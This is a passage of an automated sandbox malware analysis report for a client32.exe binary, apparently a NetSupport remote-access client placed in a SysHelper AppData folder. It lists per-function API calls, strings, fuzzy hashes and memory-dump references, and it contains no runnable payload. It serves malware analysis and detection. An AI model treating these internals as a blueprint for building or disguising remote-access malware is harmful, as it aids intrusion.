Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: InitializeObjectSingleUninitializeWait
String ID: PCSystemTypeEx$Win32_ComputerSystem
API String ID: 2994556011-578995875
Opcode ID: cb70902765e9df780483309619877a5cdd6fdcad1f0a8482e579a40db52188bc
Instruction ID: 2dfd674cbcced21787933601e0fbf0765c8f89b6bf193c9c24077654eb832309
Opcode Fuzzy Hash: cb70902765e9df780483309619877a5cdd6fdcad1f0a8482e579a40db52188bc
Instruction Fuzzy Hash: D62129B1E006669BDF11CBA0CC44B6EB7E89F45358F1000B5FC58DA2C8FAB8E940D791

Function 11140870 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

Part of subcall function 11140290: GetCurrentProcess.KERNEL32(00000000,?,111404E3,?), ref: 1114029C
Part of subcall function 11140290: GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\SysHelper\client32.exe,00000104,?,111404E3,?), ref: 111402B9

WaitForMultipleObjects.KERNEL32(00000000,?,00000000,000000FF), ref: 111408C5
ResetEvent.KERNEL32(00000250), ref: 111408D9
SetEvent.KERNEL32(00000250), ref: 111408EF
WaitForMultipleObjects.KERNEL32(00000000,?,00000000,000000FF), ref: 111408FE

Strings

MiniDump, xrefs: 11140877

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: EventMultipleObjectsWait$CurrentFileModuleNameProcessReset
String ID: MiniDump
API String ID: 1494854734-2840755058
Opcode ID: b5093043549d72af129595f684cc28810df42538d39778bc18dae4ac23f44b08
Instruction ID: 82be7c26d502f028142b998fa5126df4c28d1bc7d262cc6800bde2f36eb64e35
Opcode Fuzzy Hash: b5093043549d72af129595f684cc28810df42538d39778bc18dae4ac23f44b08
Instruction Fuzzy Hash: F311D675E0022667F700DFE9CC81F9AB7689B05B68F214234F624E66C4E761A5418BA5

Function 11017440 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 70synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(000002EC,000000FF), ref: 11017472
CoInitialize.OLE32(00000000), ref: 1101747B
CoUninitialize.COMBASE(00000001,?,?), ref: 11017500

Strings

Win32_SystemEnclosure, xrefs: 11017493
ChassisTypes, xrefs: 110174B2

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: InitializeObjectSingleUninitializeWait
String ID: ChassisTypes$Win32_SystemEnclosure
API String ID: 2994556011-2037925671
Opcode ID: f0ded35296c55d0866425beafa263bb65a3590a39d35365136548dea7fc607f2
Instruction ID: d4ceec51b3d1aeb93fa2206dcf0162908bfa0d380c5fa1549f26343d1b5ce827
Opcode Fuzzy Hash: f0ded35296c55d0866425beafa263bb65a3590a39d35365136548dea7fc607f2
Instruction Fuzzy Hash: 29213575D406655BDB12CBA4CC45BAEBBED9F84358F0000A4EC58DB288EF39D900C761

Function 68598E28 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 64COMMON

Download Yara Rule

APIs

Part of subcall function 68595000: GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 68595014
Part of subcall function 68595000: K32GetModuleFileNameExA.KERNEL32(00000FA0,?,00000000,00000104,00000000,?,68598E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 68595034

CloseHandle.KERNEL32(00000000,00000000,?,00000FA0,?), ref: 68598EAE
FreeLibrary.KERNEL32(?), ref: 68598EBF

Part of subcall function 68592420: _strrchr.LIBCMT ref: 6859242E

Strings

pcictl_247.dll, xrefs: 68598E6C
Set Is247=%d, xrefs: 68598ED7
NSM247Ctl.dll, xrefs: 68598E7E

Memory Dump Source

Source File: 00000007.00000002.4193643921.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.4193596158.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193677997.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193696542.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193715550.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193715550.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193788365.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: AddressCloseFileFreeHandleLibraryModuleNameProc_strrchr
String ID: NSM247Ctl.dll$Set Is247=%d$pcictl_247.dll
API String ID: 3215810784-3459472706
Opcode ID: 0c1eb459a09f90f08b246fdc623d0ac87a7dfdcf7a84f62f4c546c9f912fbc31
Instruction ID: 2e7df5cad1e1d205e57a65cd7d462213f867fb545e006c7e25943846b542b7cb
Opcode Fuzzy Hash: 0c1eb459a09f90f08b246fdc623d0ac87a7dfdcf7a84f62f4c546c9f912fbc31
Instruction Fuzzy Hash: 6111C879A801559FEF10DA55DC51BFEB364EB45305FC00455EE2DE3240EB319E44CB66

Function 111433B0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57COMMON

Download Yara Rule

APIs

LoadStringA.USER32(00000000,?,?,00000400), ref: 111433DF
wsprintfA.USER32 ref: 11143416

Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9

Strings

..\ctl32\util.cpp, xrefs: 1114342B
#%d, xrefs: 11143410
i < _tsizeof (buf), xrefs: 11143430

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: wsprintf$ErrorExitLastLoadMessageProcessString
String ID: #%d$..\ctl32\util.cpp$i < _tsizeof (buf)
API String ID: 1985783259-2296142801
Opcode ID: ff2748ac2aec15e09c4bdc6ca979aa6eb9a6b499c93e777d6c60cf8ab22b526a
Instruction ID: c1d41daf5ac04f5e509db8cc8d6ef6429d5cf2497d86e7a71f1ea6c6f60715f8
Opcode Fuzzy Hash: ff2748ac2aec15e09c4bdc6ca979aa6eb9a6b499c93e777d6c60cf8ab22b526a
Instruction Fuzzy Hash: 2411E5FAE01228A7C711CAA59D80FEEF77C9B45708F544065FB08B3181EA30AA0587A4

Function 110312C0 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 78COMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 11031376

Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9

Strings

609290, xrefs: 11031357
%s%s.bin, xrefs: 11031370
clientinv.cpp, xrefs: 110312EE
m_pDoInv == NULL, xrefs: 110312F3

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: wsprintf$ErrorExitLastMessageProcess
String ID: %s%s.bin$609290$clientinv.cpp$m_pDoInv == NULL
API String ID: 4180936305-2272921049
Opcode ID: a91a351a66afc442ede38cb242442a1426f20364587f5a7d661eb96a4c7a4840
Instruction ID: 6dff70f8b624139b5d8b9928b76f3118b4df96bcfaa22522713f30a32685b050
Opcode Fuzzy Hash: a91a351a66afc442ede38cb242442a1426f20364587f5a7d661eb96a4c7a4840
Instruction Fuzzy Hash: 4D2181B5E00705AFD710DF65DC80BAAB7E4EB88758F10857DF825D7681E734A8008B55

Function 11140CE0 Relevance: 7.6, APIs: 5, Instructions: 66COMMONLIBRARYCODE

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(111413B8,00000000,?,111413B8,00000000), ref: 11140CFC
__strdup.LIBCMT ref: 11140D17

Part of subcall function 11080BE0: _strrchr.LIBCMT ref: 11080BEE

Part of subcall function 11140CE0: _free.LIBCMT ref: 11140D3E

_free.LIBCMT ref: 11140D4C

Part of subcall function 1115F3B5: HeapFree.KERNEL32(00000000,00000000,?,11167F76,00000000,?,110B7069), ref: 1115F3CB
Part of subcall function 1115F3B5: GetLastError.KERNEL32(00000000,?,11167F76,00000000,?,110B7069), ref: 1115F3DD

CreateDirectoryA.KERNEL32(111413B8,00000000,?,?,?,111413B8,00000000), ref: 11140D57

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _free$AttributesCreateDirectoryErrorFileFreeHeapLast__strdup_strrchr
String ID:
API String ID: 398584587-0
Opcode ID: 34ccee2d3f085fefe18343751ca6447c68098570c0016434bf78a5f48bb9111b
Instruction ID: 9875b16ed77e9f13dc3c5425d13c9245bbbda80c09f4107d02f4537b9d4f833e
Opcode Fuzzy Hash: 34ccee2d3f085fefe18343751ca6447c68098570c0016434bf78a5f48bb9111b
Instruction Fuzzy Hash: 9101F53B6042161AF301157E6D01BEFBB9C8BC2B6CF284176E98DC6585F756F41A82A2

Function 1100EC70 Relevance: 7.6, APIs: 5, Instructions: 60COMMON

Download Yara Rule

APIs

std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 1100ECA2

Part of subcall function 1115CFF4: _setlocale.LIBCMT ref: 1115D006

_free.LIBCMT ref: 1100ECB4

Part of subcall function 1115F3B5: HeapFree.KERNEL32(00000000,00000000,?,11167F76,00000000,?,110B7069), ref: 1115F3CB
Part of subcall function 1115F3B5: GetLastError.KERNEL32(00000000,?,11167F76,00000000,?,110B7069), ref: 1115F3DD

_free.LIBCMT ref: 1100ECC7
_free.LIBCMT ref: 1100ECDA
_free.LIBCMT ref: 1100ECED

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLastLocinfo::_Locinfo_dtor_setlocalestd::_
String ID:
API String ID: 3515823920-0
Opcode ID: 62c2770954d93fd006766d5ae319b04a53202b929f467d8ce75b2ef83ed42ad2
Instruction ID: 6354e4c6b4ea18464702b145c06536eed7bcdebf3ca81661a54f05b51a131181
Opcode Fuzzy Hash: 62c2770954d93fd006766d5ae319b04a53202b929f467d8ce75b2ef83ed42ad2
Instruction Fuzzy Hash: 1E11E2B1D00A559BE7A0CF99C840A0BFBFDEB41614F144A2AE426D3740E731F9048B92

Function 11141F80 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 51COMMON

Download Yara Rule

APIs

Part of subcall function 11141240: GetModuleFileNameA.KERNEL32(00000000,?,00000104,?), ref: 111412AD
Part of subcall function 11141240: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,?), ref: 111412EE
Part of subcall function 11141240: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 1114134B

wsprintfA.USER32 ref: 11141FAE
wsprintfA.USER32 ref: 11141FC4

Part of subcall function 1113F8A0: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,75BF8400,?), ref: 1113F937
Part of subcall function 1113F8A0: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 1113F957
Part of subcall function 1113F8A0: CloseHandle.KERNEL32(00000000), ref: 1113F95F

Strings

%sNSA.LIC, xrefs: 11141FBE
%sNSM.LIC, xrefs: 11141FA8
NSM.LIC, xrefs: 11141F93

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: File$CreateFolderPathwsprintf$CloseHandleModuleName
String ID: %sNSA.LIC$%sNSM.LIC$NSM.LIC
API String ID: 3779116287-2600120591
Opcode ID: 4e6b941dd91801a2435b4bb47ef9bd529b47744a684cc276ea5b71ac848a70c8
Instruction ID: b8eec695178ba2d1a937c5ef531141e0e56104a00a3206b9e8423c5fe1c12a7b
Opcode Fuzzy Hash: 4e6b941dd91801a2435b4bb47ef9bd529b47744a684cc276ea5b71ac848a70c8
Instruction Fuzzy Hash: 9001D4B9E0122D66DB50DBB09D41FEBF7ACCB44608F1001E5ED0997181EE31BA448B95

Function 1113F8A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 92fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,75BF8400,?), ref: 1113F937
CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 1113F957
CloseHandle.KERNEL32(00000000), ref: 1113F95F

Strings

", xrefs: 1113F8EE

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CreateFile$CloseHandle
String ID: "
API String ID: 1443461169-123907689
Opcode ID: a2a77767078ddfce535248fde987ff7f5033cfdc2bfe7a17f5ba387350ad47bd
Instruction ID: 9c86450901ac288abfb1a5416e129d0f3cdd4120216def2344b537bfb16cbc1a
Opcode Fuzzy Hash: a2a77767078ddfce535248fde987ff7f5033cfdc2bfe7a17f5ba387350ad47bd
Instruction Fuzzy Hash: F421BE30A0426AAFE312CE38DD54BD9BB949F82324F2041E4F9D5DB1C8EA719A488752

Function 68596610 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84networkCOMMON

Download Yara Rule

APIs

Part of subcall function 685A9BF0: _strncpy.LIBCMT ref: 685A9C14

inet_addr.WSOCK32(?,?,?,?,?,?,00002000,?,00000000), ref: 68596691
gethostbyname.WSOCK32(?,?,?,?,?,?,00002000,?,00000000), ref: 685966A2
WSAGetLastError.WSOCK32(?,?,?,?,?,?,00002000,?,00000000), ref: 685966CD

Strings

Cannot resolve hostname %s, error %d, xrefs: 685966D6

Memory Dump Source

Source File: 00000007.00000002.4193643921.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.4193596158.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193677997.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193696542.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193715550.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193715550.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193788365.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: ErrorLast_strncpygethostbynameinet_addr
String ID: Cannot resolve hostname %s, error %d
API String ID: 2603238076-1802540647
Opcode ID: ac746b96797c9f2c88474287111a265455a07addd814ddf11fcf3f1dffda775e
Instruction ID: 8ee86666c36afe0e9ec017191a216632d1fe139ab56e6a3bb53b3a1890622fb9
